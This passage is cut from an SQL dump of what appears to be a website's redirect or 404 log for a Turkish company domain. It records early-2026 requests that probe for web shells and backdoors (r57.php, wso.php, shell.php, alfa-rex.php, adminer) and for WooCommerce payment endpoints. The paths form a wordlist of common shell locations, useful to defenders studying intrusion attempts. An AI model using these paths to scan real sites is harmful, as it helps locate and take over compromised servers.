00:00:00',301),(55101,'http://3s-technologies.com.tr/en/wp-includes/images/wp-load.php',NULL,'https://www.google.de/','',2,0,'2026-01-03 19:17:36','0000-00-00 00:00:00',301),(55102,'http://3s-technologies.com.tr/en/wp-includes/interactivity-api/index.php',NULL,'https://www.bing.com/','',6,0,'2026-01-03 19:17:37','0000-00-00 00:00:00',301),(55103,'http://3s-technologies.com.tr/en/wp-includes/js/plupload/index.php',NULL,'https://www.bing.com/','',5,0,'2026-01-03 19:17:38','0000-00-00 00:00:00',301),(55104,'http://3s-technologies.com.tr/en/wp-includes/js/thickbox/index.php',NULL,'https://www.google.de/','',5,0,'2026-01-03 19:17:39','0000-00-00 00:00:00',301),(55105,'http://3s-technologies.com.tr/en/wp-includes/php-compat/index.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:17:40','0000-00-00 00:00:00',301),(55106,'http://3s-technologies.com.tr/en/wp-includes/theme-previews-exception.php',NULL,'https://www.yahoo.com/','',2,0,'2026-01-03 19:17:41','0000-00-00 00:00:00',301),(55107,'http://3s-technologies.com.tr/en/wp/wp-content/plugins/classic-editor/js/geido.php',NULL,'https://duckduckgo.com/','',2,0,'2026-01-03 19:17:42','0000-00-00 00:00:00',301),(55108,'http://3s-technologies.com.tr/en/wp/wp-content/themes/twentytwentyfour/assets/css/geido.php',NULL,'https://www.google.fr/','',2,0,'2026-01-03 19:17:43','0000-00-00 00:00:00',301),(55109,'http://3s-technologies.com.tr/tr/rezor.php',NULL,'','',13,0,'2026-01-04 10:48:00','0000-00-00 00:00:00',301),(55110,'http://3s-technologies.com.tr/tr/ajq1s.php',NULL,'','',1,0,'2026-01-04 10:48:03','0000-00-00 00:00:00',301),(55111,'http://3s-technologies.com.tr/tr/casper.php',NULL,'','',1,0,'2026-01-04 10:48:07','0000-00-00 00:00:00',301),(55112,'http://3s-technologies.com.tr/tr/geido.php',NULL,'','',1,0,'2026-01-04 10:48:08','0000-00-00 00:00:00',301),(55113,'http://3s-technologies.com.tr/tr/cachex.php',NULL,'','',3,0,'2026-01-04 10:48:11','0000-00-00 00:00:00',301),(55114,'http://3s-technologies.com.tr/tr/wpupex.php',NULL,'','',1,0,'2026-01-04 10:48:14','0000-00-00 00:00:00',301),(55115,'http://3s-technologies.com.tr/tr/halo.php',NULL,'','',1,0,'2026-01-04 10:48:15','0000-00-00 00:00:00',301),(55116,'http://3s-technologies.com.tr/tr/nck.php',NULL,'','',1,0,'2026-01-04 10:48:16','0000-00-00 00:00:00',301),(55117,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wrapper.php',NULL,'https://www.google.co.uk/','',3,0,'2026-01-04 14:45:53','0000-00-00 00:00:00',301),(55118,'http://3s-technologies.com.tr/en/wp-includes/block-supports/options.php',NULL,'https://www.yahoo.com/','',3,0,'2026-01-04 14:46:01','0000-00-00 00:00:00',301),(55119,'http://3s-technologies.com.tr/en/wp-includes/blocks/navigation-submenu/wp',NULL,'https://www.google.de/','',4,0,'2026-01-04 14:46:02','0000-00-00 00:00:00',301),(55120,'http://3s-technologies.com.tr/en/wp-includes/css/dist/wp',NULL,'https://www.bing.com/','',3,0,'2026-01-04 14:46:08','0000-00-00 00:00:00',301),(55121,'http://3s-technologies.com.tr/en/wp-includes/fonts/menu.php',NULL,'https://www.google.de/','',3,0,'2026-01-04 14:46:14','0000-00-00 00:00:00',301),(55122,'http://3s-technologies.com.tr/en/wp-includes/images/alfa-rex.php',NULL,'https://www.google.fr/','',3,0,'2026-01-04 14:46:18','0000-00-00 00:00:00',301),(55123,'http://3s-technologies.com.tr/en/wp-includes/l10n',NULL,'https://www.google.de/','',3,0,'2026-01-04 14:46:21','0000-00-00 00:00:00',301),(55124,'http://3s-technologies.com.tr/en/wp-includes/random_compat/about.php',NULL,'https://duckduckgo.com/','',3,0,'2026-01-04 14:46:23','0000-00-00 00:00:00',301),(55125,'http://3s-technologies.com.tr/en/wp-includes/random_compat/alfa-rex.php',NULL,'https://www.google.co.uk/','',3,0,'2026-01-04 14:46:24','0000-00-00 00:00:00',301),(55126,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/wp-load.php',NULL,'https://www.yahoo.com/','',3,0,'2026-01-04 14:46:30','0000-00-00 00:00:00',301),(55127,'http://3s-technologies.com.tr/en/wp-includes/sitemaps/wp',NULL,'https://www.google.co.uk/','',3,0,'2026-01-04 14:46:31','0000-00-00 00:00:00',301),(55128,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/input.php',NULL,'https://www.google.co.uk/','',3,0,'2026-01-04 14:46:37','0000-00-00 00:00:00',301),(55129,'http://3s-technologies.com.tr/en/wp-includes/theme-compat/wp',NULL,'https://www.google.com/','',3,0,'2026-01-04 14:46:38','0000-00-00 00:00:00',301),(55130,'http://3s-technologies.com.tr/en/wp-includes/themes7.php',NULL,'https://www.google.de/','',7,0,'2026-01-04 14:46:39','0000-00-00 00:00:00',301),(55131,'http://3s-technologies.com.tr/en/wp-includes/widgets/wp-load.php',NULL,'https://www.google.co.uk/','',3,0,'2026-01-04 14:46:41','0000-00-00 00:00:00',301),(55132,'http://3s-technologies.com.tr/tr/ca4.php',NULL,'','',14,0,'2026-01-04 15:47:11','0000-00-00 00:00:00',301),(55133,'http://3s-technologies.com.tr/tr/inwp.php',NULL,'','',16,0,'2026-01-04 15:47:13','0000-00-00 00:00:00',301),(55134,'http://3s-technologies.com.tr/tr/tanjiro.php',NULL,'','',12,0,'2026-01-04 15:47:17','0000-00-00 00:00:00',301),(55135,'http://3s-technologies.com.tr/tr/ad1.php',NULL,'','',17,0,'2026-01-04 15:47:18','0000-00-00 00:00:00',301),(55136,'http://3s-technologies.com.tr/tr/anz.php',NULL,'','',13,0,'2026-01-04 15:47:21','0000-00-00 00:00:00',301),(55137,'http://3s-technologies.com.tr/tr/file66.php',NULL,'','',12,0,'2026-01-04 15:47:24','0000-00-00 00:00:00',301),(55138,'http://3s-technologies.com.tr/tr/kure.php',NULL,'','',12,0,'2026-01-04 15:47:25','0000-00-00 00:00:00',301),(55139,'http://3s-technologies.com.tr/tr/gaje.php',NULL,'','',12,0,'2026-01-04 15:47:26','0000-00-00 00:00:00',301),(55140,'http://3s-technologies.com.tr/tr/blnux.php',NULL,'','',27,0,'2026-01-04 15:47:27','0000-00-00 00:00:00',301),(55141,'http://3s-technologies.com.tr/tr/fgd.php',NULL,'','',22,0,'2026-01-04 15:47:28','0000-00-00 00:00:00',301),(55142,'http://3s-technologies.com.tr/tr/msy.php',NULL,'','',12,0,'2026-01-04 15:47:29','0000-00-00 00:00:00',301),(55143,'http://3s-technologies.com.tr/tr/alog.php',NULL,'','',12,0,'2026-01-04 15:47:30','0000-00-00 00:00:00',301),(55144,'http://3s-technologies.com.tr/tr/x7t6.php',NULL,'','',16,0,'2026-01-04 15:47:31','0000-00-00 00:00:00',301),(55145,'http://3s-technologies.com.tr/tr/xwpg.php',NULL,'','',35,0,'2026-01-04 15:47:31','0000-00-00 00:00:00',301),(55146,'http://3s-technologies.com.tr/tr/rk41.php',NULL,'','',16,0,'2026-01-04 15:47:32','0000-00-00 00:00:00',301),(55147,'http://3s-technologies.com.tr/tr/ztv.php',NULL,'','',12,0,'2026-01-04 15:47:33','0000-00-00 00:00:00',301),(55148,'http://3s-technologies.com.tr/tr/sef.php',NULL,'','',12,0,'2026-01-04 15:47:35','0000-00-00 00:00:00',301),(55149,'https://3s-technologies.com.tr/en/wp-json/wc/v3/payment_gateways',NULL,'','',3,0,'2026-01-04 16:07:53','0000-00-00 00:00:00',301),(55150,'https://3s-technologies.com.tr/en/wp-json/wc/v2/payment_gateways',NULL,'','',3,0,'2026-01-04 16:07:53','0000-00-00 00:00:00',301),(55151,'https://3s-technologies.com.tr/en/wp-json/wc/store/v1/cart',NULL,'','',2,0,'2026-01-04 16:07:54','0000-00-00 00:00:00',301),(55152,'https://3s-technologies.com.tr/en/wp-json/wc/store/v1/payment_methods',NULL,'','',2,0,'2026-01-04 16:07:55','0000-00-00 00:00:00',301),(55153,'http://3s-technologies.com.tr/tr/r57.php',NULL,'','',13,0,'2026-01-04 21:34:30','0000-00-00 00:00:00',301),(55154,'http://3s-technologies.com.tr/tr/backdoor.php',NULL,'','',2,0,'2026-01-04 21:34:35','0000-00-00 00:00:00',301),(55155,'http://3s-technologies.com.tr/tr/uploads/shell.php',NULL,'','',1,0,'2026-01-04 21:34:40','0000-00-00 00:00:00',301),(55156,'http://3s-technologies.com.tr/tr/images/cmd.php',NULL,'','',1,0,'2026-01-04 21:34:41','0000-00-00 00:00:00',301),(55157,'http://3s-technologies.com.tr/tr/assets/backdoor.php',NULL,'','',1,0,'2026-01-04 21:34:42','0000-00-00 00:00:00',301),(55158,'http://3s-technologies.com.tr/tr/media/x.php',NULL,'','',1,0,'2026-01-04 21:34:43','0000-00-00 00:00:00',301),(55159,'http://3s-technologies.com.tr/tr/cache/admin.php',NULL,'','',1,0,'2026-01-04 21:34:44','0000-00-00 00:00:00',301),(55160,'http://3s-technologies.com.tr/tr/tmp/r57.php',NULL,'','',1,0,'2026-01-04 21:34:45','0000-00-00 00:00:00',301),(55161,'http://3s-technologies.com.tr/tr/logs/wso.php',NULL,'','',1,0,'2026-01-04 21:34:46','0000-00-00 00:00:00',301),(55162,'http://3s-technologies.com.tr/tr/wp-content/uploads/shell.php',NULL,'','',1,0,'2026-01-04 21:34:47','0000-00-00 00:00:00',301),(55163,'http://3s-technologies.com.tr/tr/wp-content/plugins/backdoor.php',NULL,'','',1,0,'2026-01-04 21:34:48','0000-00-00 00:00:00',301),(55164,'http://3s-technologies.com.tr/tr/wp-admin/includes/x.php',NULL,'','',1,0,'2026-01-04 21:34:50','0000-00-00 00:00:00',301),(55165,'http://3s-technologies.com.tr/tr/administrator/shell.php',NULL,'','',1,0,'2026-01-04 21:34:51','0000-00-00 00:00:00',301),(55166,'http://3s-technologies.com.tr/tr/admincp/backdoor.php',NULL,'','',1,0,'2026-01-04 21:34:52','0000-00-00 00:00:00',301),(55167,'http://3s-technologies.com.tr/tr/controlpanel/cmd.php',NULL,'','',1,0,'2026-01-04 21:34:53','0000-00-00 00:00:00',301),(55168,'http://3s-technologies.com.tr/tr/cpanel/x.php',NULL,'','',1,0,'2026-01-04 21:34:54','0000-00-00 00:00:00',301),(55169,'http://3s-technologies.com.tr/tr/logo.php',NULL,'','',1,0,'2026-01-04 21:34:55','0000-00-00 00:00:00',301),(55170,'http://3s-technologies.com.tr/tr/style.css.php',NULL,'','',1,0,'2026-01-04 21:34:58','0000-00-00 00:00:00',301),(55171,'http://3s-technologies.com.tr/tr/script.js.php',NULL,'','',1,0,'2026-01-04 21:34:59','0000-00-00 00:00:00',301),(55172,'http://3s-technologies.com.tr/tr/config.bak.php',NULL,'','',1,0,'2026-01-04 21:35:00','0000-00-00 00:00:00',301),(55173,'http://mail.3s-technologies.com.tr/tr/wp-includes',NULL,'','',6,0,'2026-01-04 23:17:09','0000-00-00 00:00:00',301),(55174,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads',NULL,'','',10,0,'2026-01-04 23:17:12','0000-00-00 00:00:00',301),(55175,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins',NULL,'','',2,0,'2026-01-04 23:17:13','0000-00-00 00:00:00',301),(55176,'http://mail.3s-technologies.com.tr/tr/assets',NULL,'','',1,0,'2026-01-04 23:17:15','0000-00-00 00:00:00',301),(55177,'http://mail.3s-technologies.com.tr/tr/wp-content',NULL,'','',46,0,'2026-01-04 23:17:16','0000-00-00 00:00:00',301),(55178,'http://mail.3s-technologies.com.tr/tr/wp-content/themes',NULL,'','',4,0,'2026-01-04 23:17:17','0000-00-00 00:00:00',301),(55179,'http://mail.3s-technologies.com.tr/tr/uploads',NULL,'','',4,0,'2026-01-04 23:17:19','0000-00-00 00:00:00',301),(55180,'http://mail.3s-technologies.com.tr/tr/upload',NULL,'','',1,0,'2026-01-04 23:17:20','0000-00-00 00:00:00',301),(55181,'http://mail.3s-technologies.com.tr/tr/files',NULL,'','',1,0,'2026-01-04 23:17:22','0000-00-00 00:00:00',301),(55182,'http://mail.3s-technologies.com.tr/tr/upload/image',NULL,'','',1,0,'2026-01-04 23:17:23','0000-00-00 00:00:00',301),(55183,'http://mail.3s-technologies.com.tr/tr/assets/include',NULL,'','',1,0,'2026-01-04 23:17:28','0000-00-00 00:00:00',301),(55184,'http://mail.3s-technologies.com.tr/tr/admin/uploads/images',NULL,'','',1,0,'2026-01-04 23:17:29','0000-00-00 00:00:00',301),(55185,'http://mail.3s-technologies.com.tr/tr/wp-includes/js',NULL,'','',2,0,'2026-01-04 23:17:30','0000-00-00 00:00:00',301),(55186,'http://mail.3s-technologies.com.tr/tr/wp-admin/css',NULL,'','',5,0,'2026-01-04 23:17:31','0000-00-00 00:00:00',301),(55187,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes',NULL,'','',1,0,'2026-01-04 23:17:32','0000-00-00 00:00:00',301),(55188,'http://mail.3s-technologies.com.tr/tr/wp-includes/text/diff/renderer',NULL,'','',1,0,'2026-01-04 23:17:33','0000-00-00 00:00:00',301),(55189,'http://mail.3s-technologies.com.tr/tr/alfa_data',NULL,'','',1,0,'2026-01-04 23:17:34','0000-00-00 00:00:00',301),(55190,'http://mail.3s-technologies.com.tr/tr/.well-knownold',NULL,'','',2,0,'2026-01-04 23:17:35','0000-00-00 00:00:00',301),(55191,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/bdkr28_ouw89ehi.php',NULL,'','',1,0,'2026-01-04 23:17:41','0000-00-00 00:00:00',301),(55192,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/import-method.php',NULL,'','',1,0,'2026-01-04 23:17:42','0000-00-00 00:00:00',301),(55193,'http://mail.3s-technologies.com.tr/tr/wp-includes/class-json-live.php',NULL,'','',1,0,'2026-01-04 23:17:43','0000-00-00 00:00:00',301),(55194,'http://mail.3s-technologies.com.tr/tr/wp-admin/maint/baru.php',NULL,'','',1,0,'2026-01-04 23:17:44','0000-00-00 00:00:00',301),(55195,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/blue/ff.php',NULL,'','',1,0,'2026-01-04 23:17:45','0000-00-00 00:00:00',301),(55196,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/v3.php',NULL,'','',1,0,'2026-01-04 23:17:46','0000-00-00 00:00:00',301),(55197,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/simi.php',NULL,'','',1,0,'2026-01-04 23:17:47','0000-00-00 00:00:00',301),(55198,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/lock.php',NULL,'','',1,0,'2026-01-04 23:17:48','0000-00-00 00:00:00',301),(55199,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo/custom-file-2-1750458941.php',NULL,'','',1,0,'2026-01-04 23:17:49','0000-00-00 00:00:00',301),(55200,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/ybvathe.php',NULL,'','',1,0,'2026-01-04 23:17:50','0000-00-00 00:00:00',301),(55201,'http://mail.3s-technologies.com.tr/tr/wp-includes/blocks/caiusk.php',NULL,'','',1,0,'2026-01-04 23:17:51','0000-00-00 00:00:00',301),(55202,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/esfqf.php',NULL,'','',1,0,'2026-01-04 23:17:52','0000-00-00 00:00:00',301),(55203,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/bootstrap.php',NULL,'','',1,0,'2026-01-04 23:17:53','0000-00-00 00:00:00',301),(55204,'http://mail.3s-technologies.com.tr/tr/.well-known/admin-profiles.php',NULL,'','',1,0,'2026-01-04 23:17:54','0000-00-00 00:00:00',301),(55205,'http://mail.3s-technologies.com.tr/tr/wp-content/upgrade/file.php',NULL,'','',1,0,'2026-01-04 23:17:55','0000-00-00 00:00:00',301),(55206,'http://mail.3s-technologies.com.tr/tr/images/test.php',NULL,'','',1,0,'2026-01-04 23:17:56','0000-00-00 00:00:00',301),(55207,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/doc.php',NULL,'','',1,0,'2026-01-04 23:17:57','0000-00-00 00:00:00',301),(55208,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/file.php',NULL,'','',1,0,'2026-01-04 23:17:59','0000-00-00 00:00:00',301),(55209,'http://mail.3s-technologies.com.tr/tr/wp-admin/includes/v3.php',NULL,'','',1,0,'2026-01-04 23:18:00','0000-00-00 00:00:00',301),(55210,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/hjerwqiotys.php',NULL,'','',1,0,'2026-01-04 23:18:01','0000-00-00 00:00:00',301),(55211,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/bdkr28_52za9ooh.php',NULL,'','',1,0,'2026-01-04 23:18:02','0000-00-00 00:00:00',301),(55212,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/h67ogbfd.php',NULL,'','',1,0,'2026-01-04 23:18:03','0000-00-00 00:00:00',301),(55213,'http://mail.3s-technologies.com.tr/tr/wp-content/uploads/moban.php',NULL,'','',1,0,'2026-01-04 23:18:04','0000-00-00 00:00:00',301),(55214,'http://mail.3s-technologies.com.tr/tr/ir7szrsouep.php',NULL,'','',1,0,'2026-01-04 23:18:05','0000-00-00 00:00:00',301),(55215,'http://mail.3s-technologies.com.tr/tr/welcome.php',NULL,'','',1,0,'2026-01-04 23:18:06','0000-00-00 00:00:00',301),(55216,'http://mail.3s-technologies.com.tr/tr/othiondwmek.php',NULL,'','',1,0,'2026-01-04 23:18:08','0000-00-00 00:00:00',301),(55217,'http://mail.3s-technologies.com.tr/tr/100.php',NULL,'','',31,0,'2026-01-04 23:18:09','0000-00-00 00:00:00',301),(55218,'http://mail.3s-technologies.com.tr/tr/config_save.php',NULL,'','',1,0,'2026-01-04 23:18:10','0000-00-00 00:00:00',301),(55219,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/twentyfive/smaxx.php',NULL,'','',1,0,'2026-01-04 23:18:11','0000-00-00 00:00:00',301),(55220,'http://mail.3s-technologies.com.tr/tr/wp-mail.php/wp-includes/id3/.info.php',NULL,'','',5,0,'2026-01-04 23:18:12','0000-00-00 00:00:00',301),(55221,'http://mail.3s-technologies.com.tr/tr/system_logs.php',NULL,'','',1,0,'2026-01-04 23:18:15','0000-00-00 00:00:00',301),(55222,'http://mail.3s-technologies.com.tr/tr/wp-content/item.php',NULL,'','',2,0,'2026-01-04 23:18:16','0000-00-00 00:00:00',301),(55223,'http://mail.3s-technologies.com.tr/tr/blog/blog.php',NULL,'','',1,0,'2026-01-04 23:18:17','0000-00-00 00:00:00',301),(55224,'http://mail.3s-technologies.com.tr/tr/wp-ad.php',NULL,'','',6,0,'2026-01-04 23:18:18','0000-00-00 00:00:00',301),(55225,'http://mail.3s-technologies.com.tr/tr/plugins/phpthumb/404.php',NULL,'','',1,0,'2026-01-04 23:18:19','0000-00-00 00:00:00',301),(55226,'http://mail.3s-technologies.com.tr/tr/support.php',NULL,'','',3,0,'2026-01-04 23:18:20','0000-00-00 00:00:00',301),(55227,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/51sge/index.php',NULL,'','',1,0,'2026-01-04 23:18:21','0000-00-00 00:00:00',301),(55228,'http://mail.3s-technologies.com.tr/tr/feedback.php',NULL,'','',1,0,'2026-01-04 23:18:22','0000-00-00 00:00:00',301),(55229,'http://mail.3s-technologies.com.tr/tr/wp-includes/themes.php',NULL,'','',1,0,'2026-01-04 23:18:25','0000-00-00 00:00:00',301),(55230,'http://mail.3s-technologies.com.tr/tr/staging.php',NULL,'','',1,0,'2026-01-04 23:18:26','0000-00-00 00:00:00',301),(55231,'http://mail.3s-technologies.com.tr/tr/wp-content/plugins/fix/sx.php',NULL,'','',1,0,'2026-01-04 23:18:28','0000-00-00 00:00:00',301),(55232,'http://mail.3s-technologies.com.tr/tr/wp-admin/network',NULL,'','',7,0,'2026-01-04 23:18:38','0000-00-00 00:00:00',301),(55233,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/modern',NULL,'','',3,0,'2026-01-04 23:18:39','0000-00-00 00:00:00',301),(55234,'http://mail.3s-technologies.com.tr/tr/wp-includes/sitemaps',NULL,'','',3,0,'2026-01-04 23:18:40','0000-00-00 00:00:00',301),(55235,'http://mail.3s-technologies.com.tr/tr/wp-includes/id3/autoload_classmap.php',NULL,'','',1,0,'2026-01-04 23:18:42','0000-00-00 00:00:00',301),(55236,'http://mail.3s-technologies.com.tr/tr/admin/uploads',NULL,'','',1,0,'2026-01-04 23:18:48','0000-00-00 00:00:00',301),(55237,'http://mail.3s-technologies.com.tr/tr/wp-error.php',NULL,'','',1,0,'2026-01-04 23:18:50','0000-00-00 00:00:00',301),(55238,'http://mail.3s-technologies.com.tr/tr/wp-includes/customize',NULL,'','',1,0,'2026-01-04 23:18:51','0000-00-00 00:00:00',301),(55239,'http://mail.3s-technologies.com.tr/tr/wp-includes/images/media',NULL,'','',1,0,'2026-01-04 23:18:52','0000-00-00 00:00:00',301),(55240,'http://mail.3s-technologies.com.tr/tr/wp-includes/fonts',NULL,'','',1,0,'2026-01-04 23:18:54','0000-00-00 00:00:00',301),(55241,'http://mail.3s-technologies.com.tr/tr/wp/wp-admin/includes',NULL,'','',1,0,'2026-01-04 23:18:55','0000-00-00 00:00:00',301),(55242,'http://mail.3s-technologies.com.tr/tr/wp-includes/pomo',NULL,'','',2,0,'2026-01-04 23:18:56','0000-00-00 00:00:00',301),(55243,'http://mail.3s-technologies.com.tr/tr/templates/cassiopeia/index.php',NULL,'','',1,0,'2026-01-04 23:18:59','0000-00-00 00:00:00',301),(55244,'http://mail.3s-technologies.com.tr/tr/wp-includes/css',NULL,'','',6,0,'2026-01-04 23:19:00','0000-00-00 00:00:00',301),(55245,'http://mail.3s-technologies.com.tr/tr/wp-includes/css/dist',NULL,'','',22,0,'2026-01-04 23:19:01','0000-00-00 00:00:00',301),(55246,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/sunrise',NULL,'','',2,0,'2026-01-04 23:19:02','0000-00-00 00:00:00',301),(55247,'http://mail.3s-technologies.com.tr/tr/wp-includes/js/tinymce/langs',NULL,'','',1,0,'2026-01-04 23:19:06','0000-00-00 00:00:00',301),(55248,'http://mail.3s-technologies.com.tr/tr/wp-admin/css/colors/midnight',NULL,'','',2,0,'2026-01-04 23:19:10','0000-00-00 00:00:00',301),(55249,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/widgets/index.php',NULL,'','',15,0,'2026-01-04 23:19:13','0000-00-00 00:00:00',301),(55250,'http://3s-technologies.com.tr/tr/wp-admin/js/bdkr28_ouw89ehi.php',NULL,'','',1,0,'2026-01-05 00:31:19','0000-00-00 00:00:00',301),(55251,'http://3s-technologies.com.tr/tr/wp-includes/class-json-live.php',NULL,'','',1,0,'2026-01-05 00:31:21','0000-00-00 00:00:00',301),(55252,'http://3s-technologies.com.tr/tr/wp-admin/maint/baru.php',NULL,'','',1,0,'2026-01-05 00:31:22','0000-00-00 00:00:00',301),(55253,'http://3s-technologies.com.tr/tr/wp-admin/css/v3.php',NULL,'','',1,0,'2026-01-05 00:31:23','0000-00-00 00:00:00',301),(55254,'http://3s-technologies.com.tr/tr/wp-admin/js/simi.php',NULL,'','',1,0,'2026-01-05 00:31:24','0000-00-00 00:00:00',301),(55255,'http://3s-technologies.com.tr/tr/wp-admin/js/lock.php',NULL,'','',1,0,'2026-01-05 00:31:25','0000-00-00 00:00:00',301),(55256,'http://3s-technologies.com.tr/tr/wp-admin/css/ybvathe.php',NULL,'','',1,0,'2026-01-05 00:31:26','0000-00-00 00:00:00',301),(55257,'http://3s-technologies.com.tr/tr/wp-includes/blocks/caiusk.php',NULL,'','',1,0,'2026-01-05 00:31:27','0000-00-00 00:00:00',301),(55258,'http://3s-technologies.com.tr/tr/wp-includes/images/esfqf.php',NULL,'','',1,0,'2026-01-05 00:31:28','0000-00-00 00:00:00',301),(55259,'http://3s-technologies.com.tr/tr/wp-admin/js/bootstrap.php',NULL,'','',1,0,'2026-01-05 00:31:29','0000-00-00 00:00:00',301),(55260,'http://3s-technologies.com.tr/tr/.well-known/admin-profiles.php',NULL,'','',1,0,'2026-01-05 00:31:29','0000-00-00 00:00:00',301),(55261,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/doc.php',NULL,'','',2,0,'2026-01-05 00:31:32','0000-00-00 00:00:00',301),(55262,'http://3s-technologies.com.tr/tr/wp-admin/js/widgets/file.php',NULL,'','',2,0,'2026-01-05 00:31:32','0000-00-00 00:00:00',301),(55263,'http://3s-technologies.com.tr/tr/wp-admin/includes/v3.php',NULL,'','',2,0,'2026-01-05 00:31:33','0000-00-00 00:00:00',301),(55264,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/bdkr28_52za9ooh.php',NULL,'','',2,0,'2026-01-05 00:31:35','0000-00-00 00:00:00',301),(55265,'http://3s-technologies.com.tr/tr/wp-admin/css/colors/midnight/h67ogbfd.php',NULL,'','',2,0,'2026-01-05 00:31:35','0000-00-00 00:00:00',301),(55266,'http://3s-technologies.com.tr/tr/wp-content/uploads/moban.php',NULL,'','',2,0,'2026-01-05 00:31:36','0000-00-00 00:00:00',301),(55267,'http://3s-technologies.com.tr/tr/config_save.php',NULL,'','',1,0,'2026-01-05 00:31:41','0000-00-00 00:00:00',301),(55268,'http://3s-technologies.com.tr/tr/system_logs.php',NULL,'','',1,0,'2026-01-05 00:31:44','0000-00-00 00:00:00',301),(55269,'http://3s-technologies.com.tr/tr/support.php',NULL,'','',3,0,'2026-01-05 00:31:48','0000-00-00 00:00:00',301),(55270,'http://3s-technologies.com.tr/tr/wp-includes/id3/51sge/index.php',NULL,'','',1,0,'2026-01-05 00:31:48','0000-00-00 00:00:00',301),(55271,'http://mail.3s-technologies.com.tr/tr/assets/images/hehe.php',NULL,'','',3,0,'2026-01-05 14:14:04','0000-00-00 00:00:00',301),(55272,'http://mail.3s-technologies.com.tr/tr/wp-conter.php',NULL,'','',3,0,'2026-01-05 14:14:05','0000-00-00 00:00:00',301),(55273,'http://mail.3s-technologies.com.tr/tr/ua/index_old.php',NULL,'','',3,0,'2026-01-05 14:14:06','0000-00-00 00:00:00',301),(55274,'http://mail.3s-technologies.com.tr/tr/wp-content/themes/seotheme/radio.php',NULL,'','',2,0,'2026-01-05 14:14:07','0000-00-00 00:00:00',301),(55275,'http://mail.3s-technologies.com.tr/tr/wp-admin/js/upgrade.php',NULL,'','',3,0,'2026-01-05 14:14:08','0000-00-00 00:00:00',301),(55276,'http://mail.3s-technologies.com.tr/tr/wp-adminmaintmailer.php',NULL,'','',3,0,'2026-01-05 14:14:09','0000-00-00 00:00:00',301),(55277,'http://mail.3s-technologies.com.tr/en/ru/adminer-4.2.4.php',NULL,'','',3,0,'2026-01-05 14:14:11','0000-00-00 00:00:00',301),(55278,'http://mail.3s-technologies.com.tr/en/assets/uploads/alfacgiapi/404.php',NULL,'','',2,0,'2026-01-05 14:14:12','0000-00-00 00:00:00',301),(55279,'http://mail.3s-technologies.com.tr/en/test/adminer-4.6.1-mysql-en.php',NULL,'','',2,0,'2026-01-05 14:14:13','0000-00-00 00:00:00',301),(55280,'http://mail.3s-technologies.com.tr/en/hvoxejcn.php',NULL,'','',3,0,'2026-01-05 14:14:14','0000-00-00 00:00:00',301),(55281,'http://mail.3s-technologies.com.tr/en/rasp.php',NULL,'','',3,0,'2026-01-05 14:14:16','0000-00-00 00:00:00',301),(55282,'http://mail.3s-technologies.com.tr/en/lanz.php',NULL,'','',1,0,'2026-01-05 14:14:17','0000-00-00 00:00:00',301),(55283,'http://mail.3s-technologies.com.tr/en/xeeex.php',NULL,'','',1,0,'2026-01-05 14:14:18','0000-00-00 00:00:00',301),(55284,'http://mail.3s-technologies.com.tr/en/tons.php',NULL,'','',1,0,'2026-01-05 14:14:19','0000-00-00 00:00:00',301),(55285,'http://mail.3s-technologies.com.tr/en/wpup.php',NULL,'','',2,0,'2026-01-05 14:14:20','0000-00-00 00:00:00',301),(55286,'http://mail.3s-technologies.com.tr/en/xa.php',NULL,'','',1,0,'2026-01-05 14:14:21','0000-00-00 00:00:00',301),(55287,'http://mail.3s-technologies.com.tr/en/mini.php',NULL,'','',1,0,'2026-01-05 14:14:22','0000-00-00 00:00:00',301),(55288,'http://mail.3s-technologies.com.tr/en/acwfihfh.php',NULL,'','',1,0,'2026-01-05 14:14:23','0000-00-00 00:00:00',301),(55289,'http://mail.3s-technologies.com.tr/en/f8.php',NULL,'','',1,0,'2026-01-05 14:14:24','0000-00-00 00:00:00',301),(55290,'http://mail.3s-technologies.com.tr/en/bras.php',NULL,'','',1,0,'2026-01-05 14:14:25','0000-00-00 00:00:00',301),(55291,'http://mail.3s-technologies.com.tr/en/an8.php',NULL,'','',1,0,'2026-01-05 14:14:26','0000-00-00 00:00:00',301),(55292,'http://mail.3s-technologies.com.tr/en/esp.php',NULL,'','',1,0,'2026-01-05 14:14:27','0000-00-00 00:00:00',301),(55293,'http://mail.3s-technologies.com.tr/en/out.php',NULL,'','',1,0,'2026-01-05 14:14:30','0000-00-00 00:00:00',301),(55294,'http://mail.3s-technologies.com.tr/en/flower2.php',NULL,'','',1,0,'2026-01-05 14:14:31','0000-00-00 00:00:00',301),(55295,'http://mail.3s-technologies.com.tr/en/family.php',NULL,'','',1,0,'2026-01-05 14:14:32','0000-00-00 00:00:00',301),(55296,'http://mail.3s-technologies.com.tr/en/s1.php',NULL,'','',1,0,'2026-01-05 14:14:33','0000-00-00 00:00:00',301),(55297,'http://mail.3s-technologies.com.tr/en/ma.php',NULL,'','',1,0,'2026-01-05 14:14:34','0000-00-00 00:00:00',301),(55298,'http://mail.3s-technologies.com.tr/en/asf.php',NULL,'','',1,0,'2026-01-05 